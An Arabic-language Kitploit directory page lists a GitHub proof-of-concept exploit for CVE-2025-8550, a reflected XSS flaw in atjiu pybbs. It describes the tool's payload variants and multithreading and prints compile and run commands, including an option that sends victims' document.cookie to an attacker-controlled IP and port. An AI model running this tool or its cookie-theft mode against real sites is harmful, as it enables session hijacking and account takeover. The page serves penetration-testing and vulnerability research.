Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8550 — # استغلال إثبات المفهوم الآلي لـ CVE-2025-8550 استغلال إثبات مفهوم آلي لثغرة CVE-2025-8550، وهي ثغرة XSS منعكسة في atjiu pybbs. يتضمن أكثر من 20 صيغة حمولة، واستخراج ملفات تعريف الارتباط، وتعدد الخيوط، وواجهة سطر أوامر قابلة للتخصيص لاختبار الاختراق. | Kitploit
أدوات/GitHubGitHub/bytereaper77/cve-2025-8550
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرArchived
GitHubbytereaper77/cve-2025-8550

CVE-2025-8550

# استغلال إثبات المفهوم الآلي لـ CVE-2025-8550 استغلال إثبات مفهوم آلي لثغرة CVE-2025-8550، وهي ثغرة XSS منعكسة في atjiu pybbs. يتضمن أكثر من 20 صيغة حمولة، واستخراج ملفات تعريف الارتباط، وتعدد الخيوط، وواجهة سطر أوامر قابلة للتخصيص لاختبار الاختراق.

عرض المستودع
311منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة XSS في atjiu pybbs CVE-2025-8550

الوصف

يستضيف هذا المستودع استغلالاً آلياً لإثبات المفهوم (PoC) لثغرة CVE-2025-8550، وهي ثغرة من نوع البرمجة النصية عبر المواقع المنعكسة (XSS) في atjiu pybbs (الإصدار ≤ v6.0.0). تستهدف هذه الثغرة معامل username في نقطة النهاية /admin/topic/list، الذي يفتقر إلى تنقية الإدخال المناسبة.

الميزات

  • أكثر من 20 اختلافاً للحمولة: سكريبت، SVG، iframe، object، معالجات onerror وغيرها.

  • تشفير URL تلقائي: يضمن الحقن الآمن عبر curl_easy_escape من libcurl.

  • استخراج ملفات تعريف الارتباط (اختياري): حقن إشارة لإرسال document.cookie إلى خادم يتحكم به المهاجم.

  • تعدد الخيوط: يستخدم pthreads لتوازي المحاولات وتسريع الاختبار.

  • واجهة سطر أوامر قابلة للتخصيص: مدعومة بـ argparse، تدعم تحديد:

  • عنوان URL الهدف (-u / --url)
  • ملف ملفات تعريف الارتباط للطلبات الموثقة (-c / --cookies)
  • تمكين حمولة ملفات تعريف الارتباط (-k / --cokpay)
  • عنوان IP ومنفذ خادم المهاجم (-i / --ip، -p / --port)
  • تسجيل مفصل (-v / --verbose)

البناء والاستخدام

root@kitploit:~
# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
  • استبدل http://<TARGET> بمثيل atjiu pybbs الخاص بك.
  • استخدم -k لتفعيل إشارة سرقة ملفات تعريف الارتباط (يتطلب -i و -p).
  • احذف -c إذا لم تكن هناك حاجة لملفات تعريف الارتباط الخاصة بالمصادقة.

المراجع :

  • إدخال NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-8550

الترخيص :

MIT License

تنزيل الأداة